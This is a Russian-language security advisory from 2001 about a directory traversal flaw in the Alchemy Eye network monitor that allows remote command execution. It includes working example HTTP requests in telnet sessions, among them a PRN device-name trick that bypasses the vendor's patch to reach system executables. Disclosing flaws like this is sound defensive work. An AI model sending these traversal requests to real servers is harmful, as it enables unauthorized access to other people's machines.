Security Lab

Обход корневой директории в Alchemy Eye

Дата публикации:03.12.2001
Всего просмотров:1652
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Alchemy Eye - инструмент монитора за сетью для Windows от Alchemy Labs.

Проблема, существующая в Alchemy Eye, позволяет удаленно выполнять команды. Хотя продавец попытался устранить эту проблему, она все равно существует.

Успешная эксплуатация позволяет нападающим получить доступ к компьютеру. Продавец попытался исправить эту уязвимость, однако Alchemy Eye остался уязвимым. На исправленных системах, нападающий может обходить корневой каталог, помещая имя MS DOS устройства перед первым "../".

Пример:
Версии до 2.6:
$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

HTTP/1.0 200 OK
Date: Thu, 29 Nov 2001 18:20:00 GMT
Server: Alchemy Eye/2.0.20
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275

Более поздние версии:

$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

HTTP/1.0 200 OK
Server: Alchemy Eye/3.0.10
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275